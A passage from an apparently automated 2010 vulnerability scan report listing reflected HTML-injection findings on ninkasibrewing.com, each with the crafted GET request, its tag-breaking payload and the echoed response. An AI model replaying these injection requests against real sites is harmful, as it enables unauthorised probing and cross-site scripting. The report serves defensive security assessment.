       <base href="http://www.n
...[SNIP]...
<body id="beersf0387"><a>286a56ca007_page" class="beersf0387">
...[SNIP]...

1.158. http://www.ninkasibrewing.com/beers/content/js/basic.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dad3"><a>57b154d7fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers3dad3"><a>57b154d7fd1/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers3dad3"><a>57b154d7fd1_page" class="beers3dad3">
...[SNIP]...

1.159. http://www.ninkasibrewing.com/beers/content/js/combined.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed707"><a>9aff3285dbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beersed707"><a>9aff3285dbf/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beersed707"><a>9aff3285dbf_page" class="beersed707">
...[SNIP]...

1.160. http://www.ninkasibrewing.com/beers/content/js/combined.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /beers/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337e"><a>bf74ccda1f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers3337e"><a>bf74ccda1f5/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="beers3337e"><a>bf74ccda1f5_page" class="beers3337e">
...[SNIP]...

1.161. http://www.ninkasibrewing.com/brewery/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72af8"><a>8c4153079a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery72af8"><a>8c4153079a4/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery72af8"><a>8c4153079a4_page" class="brewery72af8">
...[SNIP]...

1.162. http://www.ninkasibrewing.com/brewery/content/css/basic.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef1f"><a>2fabca1655f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery6ef1f"><a>2fabca1655f/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery6ef1f"><a>2fabca1655f_page" class="brewery6ef1f">
...[SNIP]...

1.163. http://www.ninkasibrewing.com/brewery/content/css/ninkasi.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf8b"><a>2b307023ca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewerycaf8b"><a>2b307023ca2/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewerycaf8b"><a>2b307023ca2_page" class="brewerycaf8b">
...[SNIP]...

1.164. http://www.ninkasibrewing.com/brewery/content/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c630"><a>4b43cdb9ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery2c630"><a>4b43cdb9ffe/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery2c630"><a>4b43cdb9ffe_page" class="brewery2c630">
...[SNIP]...

1.165. http://www.ninkasibrewing.com/brewery/content/js/basic.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd1a"><a>7a2e695ff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery8bd1a"><a>7a2e695ff2/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery8bd1a"><a>7a2e695ff2_page" class="brewery8bd1a">
...[SNIP]...

1.166. http://www.ninkasibrewing.com/brewery/content/js/combined.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78fa0"><a>dd60fcefdd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery78fa0"><a>dd60fcefdd7/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery78fa0"><a>dd60fcefdd7_page" class="brewery78fa0">
...[SNIP]...

1.167. http://www.ninkasibrewing.com/brewery/content/js/combined.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /brewery/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a328"><a>58cb21c931b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery1a328"><a>58cb21c931b/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="brewery1a328"><a>58cb21c931b_page" class="brewery1a328">
...[SNIP]...

1.168. http://www.ninkasibrewing.com/careers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebf4"><a>6ff175caf2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersbebf4"><a>6ff175caf2b/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersbebf4"><a>6ff175caf2b_page" class="careersbebf4">
...[SNIP]...

1.169. http://www.ninkasibrewing.com/careers/content/css/basic.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload becda"><a>fd1c2df5815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersbecda"><a>fd1c2df5815/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersbecda"><a>fd1c2df5815_page" class="careersbecda">
...[SNIP]...

1.170. http://www.ninkasibrewing.com/careers/content/css/ninkasi.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd34a"><a>b8b6cd26d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersfd34a"><a>b8b6cd26d1a/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersfd34a"><a>b8b6cd26d1a_page" class="careersfd34a">
...[SNIP]...

1.171. http://www.ninkasibrewing.com/careers/content/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b5f"><a>54c1eee5e30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersb4b5f"><a>54c1eee5e30/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersb4b5f"><a>54c1eee5e30_page" class="careersb4b5f">
...[SNIP]...

1.172. http://www.ninkasibrewing.com/careers/content/js/basic.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ea2"><a>efc19015908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersd9ea2"><a>efc19015908/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersd9ea2"><a>efc19015908_page" class="careersd9ea2">
...[SNIP]...

1.173. http://www.ninkasibrewing.com/careers/content/js/combined.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea81e"><a>7759b9fb197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersea81e"><a>7759b9fb197/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careersea81e"><a>7759b9fb197_page" class="careersea81e">
...[SNIP]...

1.174. http://www.ninkasibrewing.com/careers/content/js/combined.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /careers/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87c5"><a>07d9d56d600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careerse87c5"><a>07d9d56d600/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="careerse87c5"><a>07d9d56d600_page" class="careerse87c5">
...[SNIP]...

1.175. http://www.ninkasibrewing.com/company/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806cc"><a>6e5127e8258 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company806cc"><a>6e5127e8258/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
